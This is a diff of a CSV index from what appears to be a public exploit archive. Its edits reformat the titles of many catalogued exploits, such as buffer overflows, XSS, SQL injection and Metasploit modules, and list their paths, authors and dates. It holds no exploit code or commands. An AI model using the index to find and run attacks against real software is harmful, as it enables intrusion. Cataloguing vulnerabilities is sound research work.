23494,platforms/php/webapps/23494.txt,"Clockstone and other CMSMasters Theme - File Upload",2012-12-19,DigiP,php,webapps,0 23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",php,webapps,0 -23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 GIF Decode Crash PoC",2012-12-19,"Lizhi Wang",windows,dos,0 +23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash PoC",2012-12-19,"Lizhi Wang",windows,dos,0 23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote DoS",2004-02-13,"intuit e.b.",windows,dos,0 23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass",2004-02-13,anonymous,windows,remote,0 23498,platforms/hardware/webapps/23498.txt,"SonicWall SonicOS 5.8.1.8 WAF XSS",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple XSS Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio - ISSymbol.ocx InternationalSeparator() Heap Overflow",2012-12-20,Metasploit,windows,remote,0 23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x - Unauthorized Admin Access",2004-01-30,"Himeur Nourredine",php,webapps,0 -23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 -23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0 +23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 +23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0 23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",windows,remote,0 23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp CHM File Execution Weakness",2003-12-30,"Arman Nayyeri",windows,dos,0 23505,platforms/osx/dos/23505.c,"Apple MacOS X 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 @@ -20730,8 +20725,8 @@ id,file,description,date,author,platform,type,port 23509,platforms/windows/remote/23509.c,"YaSoft Switch Off 2.3 - swnet.dll Remote Buffer Overflow",2004-01-02,MrNice,windows,remote,0 23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0 23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0 -23512,platforms/windows/dos/23512.txt,"Surfnet 1.31 CMD_CREDITCARD_CHARGE Denial of Service",2004-01-02,Rift_XT,windows,dos,0 -23513,platforms/php/webapps/23513.txt,"Athena Web Registration Remote Command Execution",2004-01-02,"Peter Kieser",php,webapps,0 +23512,platforms/windows/dos/23512.txt,"Surfnet 1.31 - CMD_CREDITCARD_CHARGE Denial of Service",2004-01-02,Rift_XT,windows,dos,0 +23513,platforms/php/webapps/23513.txt,"Athena Web Registration - Remote Command Execution",2004-01-02,"Peter Kieser",php,webapps,0 23514,platforms/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server - Buffer Overflow",2004-01-04,"Peter Winter-Smith",windows,remote,0 23515,platforms/asp/webapps/23515.txt,"ASPApp PortalAPP - Remote User Database Access",2004-01-04,newbie6290,asp,webapps,0 23516,platforms/asp/webapps/23516.txt,"ASP-Nuke 1.0/1.2/1.3 - Remote User Database Access",2004-01-04,"Vietnamese Security Group",asp,webapps,0 @@ -20741,13 +20736,13 @@ id,file,description,date,author,platform,type,port 23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 - Multiple PHP Remote File Inclusion",2004-01-06,Windak,php,webapps,0 23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 - Search.php Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 - Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 -23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",multiple,remote,0 +23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP - Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",multiple,remote,0 23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) 7.5.1 - NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 - Crash PoC",2012-12-20,nitr0us,multiple,dos,0 23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting",2004-01-06,Windak,php,webapps,0 -23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 PHPInfo Information Disclosure Weakness",2004-01-06,Windak,php,webapps,0 +23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure Weakness",2004-01-06,Windak,php,webapps,0 23527,platforms/hardware/remote/23527.txt,"ZyXEL ZyWALL 10 Management Interface - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote,0 -23528,platforms/hardware/remote/23528.txt,"Edimax AR-6004 ADSL Router Management Interface Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote,0 +23528,platforms/hardware/remote/23528.txt,"Edimax AR-6004 ADSL Router - Management Interface Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote,0 23529,platforms/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",windows,remote,0 23530,platforms/windows/dos/23530.c,"Kroum Grigorov KpyM Telnet Server 1.0 - Remote Denial of Service",2004-01-07,NoRpiuS,windows,dos,0 23531,platforms/windows/remote/23531.c,"HD Soft Windows FTP Server 1.5/1.6 - Username Format String",2004-01-12,mandragore,windows,remote,0 @@ -20758,11 +20753,11 @@ id,file,description,date,author,platform,type,port 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps,0 23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - Module.php Remote Command Execution",2004-01-10,"Zero X",php,webapps,0 23538,platforms/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 - Remote Denial of Service",2004-01-12,dr_insane,windows,dos,0 -23539,platforms/linux/dos/23539.txt,"Mabry Software FTPServer/X 1.0 Controls Format String",2004-01-12,"Jan-Olivier Fillols",linux,dos,0 -23540,platforms/freebsd/dos/23540.c,"KAME Racoon 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",freebsd,dos,0 +23539,platforms/linux/dos/23539.txt,"Mabry Software FTPServer/X 1.0 - Controls Format String",2004-01-12,"Jan-Olivier Fillols",linux,dos,0 +23540,platforms/freebsd/dos/23540.c,"KAME Racoon - 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",freebsd,dos,0 23541,platforms/multiple/remote/23541.c,"lionmax software www file share pro 2.4x - Multiple Vulnerabilities (1)",2004-01-14,"Luigi Auriemma",multiple,remote,0 23542,platforms/multiple/remote/23542.c,"lionmax software www file share pro 2.4x - Multiple Vulnerabilities (2)",2004-01-14,"Luigi Auriemma",multiple,remote,0 -23543,platforms/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",multiple,dos,0 +23543,platforms/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 - Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",multiple,dos,0 23544,platforms/windows/remote/23544.txt,"vicomsoft rapidcache server 2.0/2.2.6 - Directory Traversal",2004-01-15,"Peter Winter-Smith",windows,remote,0 23545,platforms/hardware/remote/23545.txt,"Whale Communications e-Gap Security Appliance 2.5 - Login Page Source Code Disclosure",2004-01-15,Procheckup,hardware,remote,0 23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function XSS",2004-01-16,JeiAr,php,webapps,0 @@ -20791,7 +20786,7 @@ id,file,description,date,author,platform,type,port 23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS - (ASP.NET) Arbitrary File Upload",2012-12-21,040,asp,webapps,0 23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 -23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 +23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injection",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload Weakness",2004-03-24,wirepair,windows,remote,0 23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Remote Directory Traversal",2004-03-24,"Ziv Kamir",windows,remote,0 @@ -20802,24 +20797,24 @@ id,file,description,date,author,platform,type,port 23583,platforms/multiple/remote/23583.txt,"Netbus 2.0 Pro Directory Listings Disclosure and File Upload",2004-01-22,"Rafel Ivgi The-Insider",multiple,remote,0 23584,platforms/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent HTTP POST Buffer Mismanagement",2004-01-22,cyber_flash,windows,dos,0 23585,platforms/linux/remote/23585.txt,"Finjan SurfinGate 6.0/7.0 - FHTTP Restart Command Execution",2004-01-23,"David Byrne",linux,remote,0 -23586,platforms/netware/remote/23586.txt,"Novell Netware Enterprise Web Server 5.1/6.0 env.bas Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 -23587,platforms/netware/remote/23587.txt,"Novell Netware Enterprise Web Server 5.1/6.0 snoop.jsp Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 +23586,platforms/netware/remote/23586.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - env.bas Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 +23587,platforms/netware/remote/23587.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - snoop.jsp Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 23588,platforms/netware/remote/23588.txt,"Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet - Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 23589,platforms/netware/remote/23589.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - Multiple XSS Vulnerabilities",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0 23591,platforms/windows/remote/23591.c,"RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow (1)",2004-01-24,mandragore,windows,remote,0 23592,platforms/windows/remote/23592.c,"RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow (2)",2004-01-25,mslug@safechina.net,windows,remote,0 -23593,platforms/multiple/remote/23593.txt,"Oracle HTTP Server 8.1.7/9.0.1/9.2 isqlplus Cross-Site Scripting",2004-01-24,"Rafel Ivgi The-Insider",multiple,remote,0 +23593,platforms/multiple/remote/23593.txt,"Oracle HTTP Server 8.1.7/9.0.1/9.2 - isqlplus Cross-Site Scripting",2004-01-24,"Rafel Ivgi The-Insider",multiple,remote,0 23594,platforms/windows/remote/23594.txt,"tinyserver 1.1 - Directory Traversal",2004-01-24,"Donato Ferrante",windows,remote,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 23596,platforms/windows/remote/23596.txt,"TinyServer 1.1 - Cross-Site scripting",2004-01-24,"Donato Ferrante",windows,remote,0 23597,platforms/windows/remote/23597.txt,"borland Web server for corel paradox 1.0 b3 - Directory Traversal",2004-01-24,"Rafel Ivgi The-Insider",windows,remote,0 -23598,platforms/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 db2www Error Message Cross-Site Scripting",2004-01-26,"Carsten Eiram",multiple,remote,0 +23598,platforms/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 - db2www Error Message Cross-Site Scripting",2004-01-26,"Carsten Eiram",multiple,remote,0 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection",2004-01-26,"Bharat Mediratta",php,webapps,0 23600,platforms/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",multiple,remote,0 23694,platforms/windows/remote/23694.rb,"RealPlayer - .RealMedia File Handling Buffer Overflow",2012-12-27,Metasploit,windows,remote,0 23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP - Remote Command Execution",2012-12-23,Metasploit,multiple,remote,0 -23602,platforms/windows/dos/23602.txt,"mIRC 6.1 DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 +23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0 23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting",2004-01-26,"César Fernández",solaris,remote,0 @@ -20866,7 +20861,7 @@ id,file,description,date,author,platform,type,port 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0 23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution",2012-12-25,Metasploit,windows,remote,0 -23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler Command Injection",2012-12-25,Metasploit,windows,remote,0 +23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection",2012-12-25,Metasploit,windows,remote,0 23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0 @@ -20879,7 +20874,7 @@ id,file,description,date,author,platform,type,port 23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0 23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 - 'News' Module Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0 -23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 Results.STM Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 +23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - Results.STM Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0 23666,platforms/php/webapps/23666.txt,"JShop E-Commerce Suite xSearch Cross-Site Scripting",2004-02-09,"David Sopas Ferreira",php,webapps,0 23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0 @@ -20896,7 +20891,7 @@ id,file,description,date,author,platform,type,port 23678,platforms/windows/remote/23678.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (1)",2004-02-10,"Cheng Peng Su",windows,remote,0 23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0 23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0 -23681,platforms/windows/dos/23681.pl,"EvolutionX Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0 +23681,platforms/windows/dos/23681.pl,"EvolutionX - Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0 23682,platforms/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 @@ -20912,14 +20907,14 @@ id,file,description,date,author,platform,type,port 23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x - Custva.asp redirectUrl Parameter XSS",2004-02-16,"Nick Gudov",asp,webapps,0 23705,platforms/cgi/webapps/23705.txt,"ShopCartCGI 2.3 - gotopage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23706,platforms/cgi/webapps/23706.txt,"ShopCartCGI 2.3 - genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 -23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0 +23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0 23708,platforms/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow (1)",2004-02-16,gsicht,windows,dos,0 23709,platforms/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow (2)",2004-02-16,NoRpiuS,windows,dos,0 23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 - Quote Parameter SQL Injection",2004-02-16,BaCkSpAcE,php,webapps,0 23711,platforms/php/webapps/23711.txt,"Ecommerce Corporation Online Store Kit 3.0 - More.php id Parameter SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 23712,platforms/php/webapps/23712.txt,"Ecommerce Corporation Online Store Kit 3.0 - More.php XSS",2003-02-17,"David Sopas Ferreira",php,webapps,0 23713,platforms/windows/dos/23713.txt,"Vizer Web Server 1.9.1 - Remote Denial of Service",2004-02-17,"Donato Ferrante",windows,dos,0 -23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 GET Request Buffer Overflow",2004-02-13,badpack3t,windows,remote,0 +23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Request Buffer Overflow",2004-02-13,badpack3t,windows,remote,0 23715,platforms/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,windows,dos,0 23716,platforms/windows/dos/23716.txt,"SmallFTPD 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",windows,dos,0 23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing Weakness",2004-02-17,"Bartosz Kwitkowski",windows,remote,0 @@ -20940,22 +20935,22 @@ id,file,description,date,author,platform,type,port 23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote,0 23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0 -23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote POST-Auth Root Command Execution",2012-12-29,xistence,hardware,remote,0 +23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Post-Auth Root Command Execution",2012-12-29,xistence,hardware,remote,0 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0 23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Local Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0 23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0 -23741,platforms/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy Buffer Overrun",2004-02-23,kralor,windows,remote,0 +23741,platforms/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy - Buffer Overrun",2004-02-23,kralor,windows,remote,0 23742,platforms/php/webapps/23742.txt,"phpNewsManager 1.36 - Functions Script File Disclosure",2004-02-23,G00db0y,php,webapps,0 23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0 -23744,platforms/php/webapps/23744.txt,"EZBoard 7.3 Font Tag HTML Injection",2004-02-23,"Cheng Peng Su",php,webapps,0 +23744,platforms/php/webapps/23744.txt,"EZBoard 7.3 - Font Tag HTML Injection",2004-02-23,"Cheng Peng Su",php,webapps,0 23745,platforms/php/webapps/23745.txt,"XMB Forum 1.8 - u2uadmin.php uid Parameter XSS",2004-02-23,"Janek Vind",php,webapps,0 23746,platforms/php/webapps/23746.txt,"XMB Forum 1.8 - editprofile.php user Parameter XSS",2004-02-23,"Janek Vind",php,webapps,0 23747,platforms/php/webapps/23747.txt,"XMB Forum 1.8 - BBcode align Tag XSS",2004-02-23,"Janek Vind",php,webapps,0 23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 - forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 CSS HTML Injection",2004-02-23,"Michael Scovetta",php,webapps,0 -23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-authenticated Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 +23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-Authenticated Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote,0 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos,0 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - phptest.php Path Disclosure",2004-02-24,"Rafel Ivgi",php,webapps,0 @@ -20980,9 +20975,9 @@ id,file,description,date,author,platform,type,port 23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting",2004-03-01,"David Sopas Ferreira",php,webapps,0 23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0 -23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite Web Mail Cross-Site Scripting",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 -23777,platforms/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 NULL URL Character Unauthorized Access",2004-03-01,"Mitch Adair",linux,remote,0 -23778,platforms/hardware/dos/23778.c,"Motorola T720 Phone Denial of Service",2004-03-01,"Shaun Colley",hardware,dos,0 +23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite - Web Mail Cross-Site Scripting",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 +23777,platforms/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Access",2004-03-01,"Mitch Adair",linux,remote,0 +23778,platforms/hardware/dos/23778.c,"Motorola T720 Phone - Denial of Service",2004-03-01,"Shaun Colley",hardware,dos,0 23779,platforms/linux/dos/23779.txt,"Grep < 2.11 - Integer Overflow Crash PoC",2012-12-31,"Joshua Rogers",linux,dos,0 23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 - Crash PoC",2012-12-31,IndonesiaGokilTeam,windows,dos,0 23781,platforms/php/webapps/23781.txt,"MyBB - (editpost.php posthash) SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 @@ -20992,7 +20987,7 @@ id,file,description,date,author,platform,type,port 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter XSS",2004-04-23,waraxe,php,webapps,0 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free",2013-01-02,Metasploit,windows,remote,0 -23786,platforms/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series Denial of Service",2004-03-02,"Alex Hernandez",hardware,dos,0 +23786,platforms/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series - Denial of Service",2004-03-02,"Alex Hernandez",hardware,dos,0 23787,platforms/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow",2004-03-02,JeFFOsZ,multiple,dos,0 23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0 23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos,0 @@ -21010,16 +21005,16 @@ id,file,description,date,author,platform,type,port 23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote,0 23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0 23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 - Error Page XSS",2004-03-11,"Donato Ferrante",linux,remote,0 -23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",cgi,remote,0 +23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 - Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",cgi,remote,0 23805,platforms/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service",2004-03-11,"Luigi Auriemma",multiple,dos,0 23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - dir Parameter Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0 23807,platforms/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps,0 23808,platforms/hardware/remote/23808.txt,"IP3 Networks IP3 NetAccess Appliance SQL Injection",2004-03-12,"Syam Yanuar",hardware,remote,0 -23809,platforms/cgi/webapps/23809.txt,"Emumail EMU Webmail 5.2.7 nit.emu Information Disclosure",2004-03-12,dr_insane,cgi,webapps,0 +23809,platforms/cgi/webapps/23809.txt,"Emumail EMU Webmail 5.2.7 - nit.emu Information Disclosure",2004-03-12,dr_insane,cgi,webapps,0 